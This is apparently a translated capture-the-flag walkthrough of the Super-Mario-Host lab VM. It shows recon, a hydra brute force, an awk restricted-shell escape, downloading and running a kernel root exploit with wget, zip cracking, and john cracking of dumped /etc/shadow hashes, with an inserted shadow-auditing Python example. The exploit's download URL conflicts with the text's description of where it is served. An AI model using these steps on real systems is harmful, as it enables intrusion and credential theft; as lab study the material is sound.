Super-Mario-Host (Super Mario) target VM
For personal entertainment only
Target VM download on Baidu Cloud, link: https://pan.baidu.com/s/13l1FUgJjXArfoTOfcmPsbA extraction code: a8ox
I. Host discovery
```shell
arp-scan -l
```
![](https://upload-images.jianshu.io/upload_images/4664072-8760f765e49368fb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
II. Vulnerability scanning
Port scan
![](https://upload-images.jianshu.io/upload_images/4664072-1f045502e8224b92.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Scan the website directories with Yujian (御剑) or dirb:
```shell
dirb http://192.168.85.144:8180 /usr/share/dirb/wordlists/big.txt
```
![](https://upload-images.jianshu.io/upload_images/4664072-8a776ebf09be9b33.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-fd3cf822e0386dde.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
III. Vulnerability discovery and exploitation
Found http://192.168.85.144:8180/vhosts
![](https://upload-images.jianshu.io/upload_images/4664072-94573875fd0b7997.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
1. Add a hosts entry
![](https://upload-images.jianshu.io/upload_images/4664072-f5574987e7919e27.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Add a resolution record for the virtual host to the local hosts file
![](https://upload-images.jianshu.io/upload_images/4664072-975a8ce9deca68e6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-460db1e32ae64a18.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
4. Visiting http://mario.supermariohost.local:8180/ in the browser shows nothing else
![](https://upload-images.jianshu.io/upload_images/4664072-3b8de56b2f769e72.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
5. Scan directories; the following directories were found
![](https://upload-images.jianshu.io/upload_images/4664072-dfc597fb1f6b1915.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-2bc93305302b21c8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Dirbuster
![](https://upload-images.jianshu.io/upload_images/4664072-a1994ac1b7878ba7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
6. Found http://mario.supermariohost.local:8180/luigi.php
![](https://upload-images.jianshu.io/upload_images/4664072-92f0bd6f22543b94.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
7. Found http://mario.supermariohost.local:8180/command.php; testing the name luigi confirms that the user exists
![](https://upload-images.jianshu.io/upload_images/4664072-4095fc67941861e8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
2. Crawl with cewl and crack with john
Use cewl to crawl the site for candidate usernames and use them as the username dictionary
Then have john generate social-engineering-style password candidates from those usernames for the brute force (not guaranteed to succeed)
```shell
cewl http://mario.supermariohost.local:8180/ -w /root/user.txt
# --stdout makes john print the rule-mangled candidates instead of trying to crack a hash file
john --wordlist=user.txt --rules --stdout > passwd.txt
```
![](https://upload-images.jianshu.io/upload_images/4664072-e7f1d42f47fe9e12.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-834f087ae55dad1e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-d798a86355cb5d83.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Failed
Use hydra instead
![](https://upload-images.jianshu.io/upload_images/4664072-3c8f894be82c815e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-672980c492c5b6f0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Login succeeded, but the shell is restricted
This restricted shell reminded me of the earlier rbash escape; vim happens to be usable here too, but that bypass did not work. Running help shows which commands the target allows
![](https://upload-images.jianshu.io/upload_images/4664072-9e569c909907cecc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
awk is available. After looking it up, awk can invoke shell commands in two ways: system and print (piped to a shell)
3. Spawn an interactive shell with awk
Try switching to a normal bash:
```shell
awk 'BEGIN{system("/bin/bash")}'
```
![](https://upload-images.jianshu.io/upload_images/4664072-cf2124087d0beba7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
After the bypass succeeded, check the target's version information: a very old version, which most likely has known vulnerabilities
Search for it on kali
4. Privilege escalation via a kernel exploit
![](https://upload-images.jianshu.io/upload_images/4664072-2e4b7059f9652ec3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
```shell
searchsploit 3.13.0
```
![](https://upload-images.jianshu.io/upload_images/4664072-e5ba58a268b85576.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Start apache on kali directly and serve the file,
![](https://upload-images.jianshu.io/upload_images/4664072-8a0a0c128644aae6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-45380e514eafbe8c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Then fetch it with wget on the target:
```shell
# -O (capital) writes the download to the given file; lowercase -o only redirects wget's log output
wget http://192.168.85.144/37292.c -O /tmp/37292.c
```
![](https://upload-images.jianshu.io/upload_images/4664072-c886ee4ff19445ce.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Compile the .c file with gcc and run it
```shell
gcc 37292.c -o rootshell
```
![](https://upload-images.jianshu.io/upload_images/4664072-00d779ceb55c6769.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Run it:
```shell
./rootshell
```
![](https://upload-images.jianshu.io/upload_images/4664072-6b115ee5dff91436.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Root privileges obtained
Upgrade to a proper tty with python
```shell
python -c 'import pty;pty.spawn("/bin/bash")'
cd /
cd root
ls
```
In the root directory there is an archive named flag.zip
![](https://upload-images.jianshu.io/upload_images/4664072-550c33093fa1b859.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
It is also a password-protected archive
![](https://upload-images.jianshu.io/upload_images/4664072-f31316663313adae.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
wget it to kali and brute-force it there
![](https://upload-images.jianshu.io/upload_images/4664072-177b93120d6b328e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
```shell
wget http://192.168.85.144:8180/flag.zip
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u flag.zip
```
![](https://upload-images.jianshu.io/upload_images/4664072-380795ea9683b332.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-3ec8ea72c3a188d0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Cracked successfully; the password is: ilovepeach
![](https://upload-images.jianshu.io/upload_images/4664072-83e1cc37d2d57bea.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
6. Get the flag
The VM author's intent is for you to obtain the plaintext passwords of all users on the target
On the target, view /etc/shadow
![](https://upload-images.jianshu.io/upload_images/4664072-6ead812e2847294a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
There are three entries in total:
```text
root:$6$ZmdseK46$FTvRqEZXdr3DCX2Vd6CXWmWAOJYIjcAI6XQathO3/wgvHEoyeP6DwL3NHZy903HXQ/F2uXiTXrhETX19/txbA1:17248:0:99999:7:::
mario:$6$WG.vWiw8$OhoMhuAHSqPYTu1wCEWNc4xoUyX6U/TrLlK.xyhRKZB3SyCtxMDSoQ6vioNvpNOu78kQVTbwTcHPQMIDM2CSJ.:17248:0:99999:7:::
luigi:$6$kAYr2OVy$1qBRKJIWqkpNohmMIP3r3H3yPDQ9UfUBcO4pahlXf6QfnqgW/XpKYlQD4jN6Cfn.3wKCWoM7gPbdIbnShFJD40:17233:0:99999:7:::
```
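As an added example that is not part of the original write-up, here is a small auditor for shadow(5) lines like the three above: it identifies the crypt(3) algorithm from the `$id$` prefix, extracts the salt, converts the last-change day count into a date, and flags accounts whose password never expires. SAMPLE_SHADOW holds the three entries shown above; the algorithm table and warning thresholds are my own choices.

```python
# Added example (not from the write-up): audit shadow(5) entries for hash algorithm,
# salt, last password change date and aging policy. SAMPLE_SHADOW = the three lines above.
from dataclasses import dataclass, field
from datetime import date, timedelta

# crypt(3) "$id$" prefixes used by glibc/libxcrypt
HASH_IDS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
            "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt"}

SAMPLE_SHADOW = """\
root:$6$ZmdseK46$FTvRqEZXdr3DCX2Vd6CXWmWAOJYIjcAI6XQathO3/wgvHEoyeP6DwL3NHZy903HXQ/F2uXiTXrhETX19/txbA1:17248:0:99999:7:::
mario:$6$WG.vWiw8$OhoMhuAHSqPYTu1wCEWNc4xoUyX6U/TrLlK.xyhRKZB3SyCtxMDSoQ6vioNvpNOu78kQVTbwTcHPQMIDM2CSJ.:17248:0:99999:7:::
luigi:$6$kAYr2OVy$1qBRKJIWqkpNohmMIP3r3H3yPDQ9UfUBcO4pahlXf6QfnqgW/XpKYlQD4jN6Cfn.3wKCWoM7gPbdIbnShFJD40:17233:0:99999:7:::
"""

@dataclass
class ShadowEntry:
    user: str
    algorithm: str
    salt: str
    last_change: date
    max_days: int
    warnings: list = field(default_factory=list)

def parse_hash(pw: str):
    # Return (algorithm, salt) for the password field of one entry
    if pw == "" or pw.startswith(("!", "*")):
        return "locked-or-none", ""      # no usable password hash
    parts = pw.split("$")                # "$6$salt$digest" -> ["", "6", "salt", "digest"]
    if len(parts) < 4:
        return "descrypt-or-unknown", ""  # legacy DES crypt has no "$id$" prefix
    algo = HASH_IDS.get(parts[1], "unknown($" + parts[1] + "$)")
    salt = parts[3] if parts[2].startswith("rounds=") else parts[2]  # skip optional rounds=N
    return algo, salt

def audit_shadow(text: str):
    # Parse shadow lines and attach policy warnings to each entry
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        f = line.split(":")
        algo, salt = parse_hash(f[1])
        last_change = date(1970, 1, 1) + timedelta(days=int(f[2] or 0))  # field 3: days since epoch
        max_days = int(f[4] or 99999)                                     # field 5: max age; empty = never
        e = ShadowEntry(f[0], algo, salt, last_change, max_days)
        if max_days >= 99999:
            e.warnings.append("no password expiry")
        if algo in ("md5crypt", "descrypt-or-unknown"):
            e.warnings.append("weak hash algorithm")
        entries.append(e)
    return entries
```

Running audit_shadow(SAMPLE_SHADOW) reports all three accounts as sha512crypt with a last change in March 2017 and no expiry, which is exactly the kind of finding a host audit would record before anyone reaches for a cracking wordlist.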
Take them to kali and crack them with john
7. Crack the hashes with john
```shell
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt
```
Example of a failed attempt
```shell
./unshadow /etc/passwd /etc/shadow > password.txt  # merge passwd and shadow into password.txt; you can also copy every field of the shadow file, or just its second field
./john password.txt  # crack the hashes
cat john.pot         # view the cracking results
```
![](https://upload-images.jianshu.io/upload_images/4664072-0f929faefa786c45.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)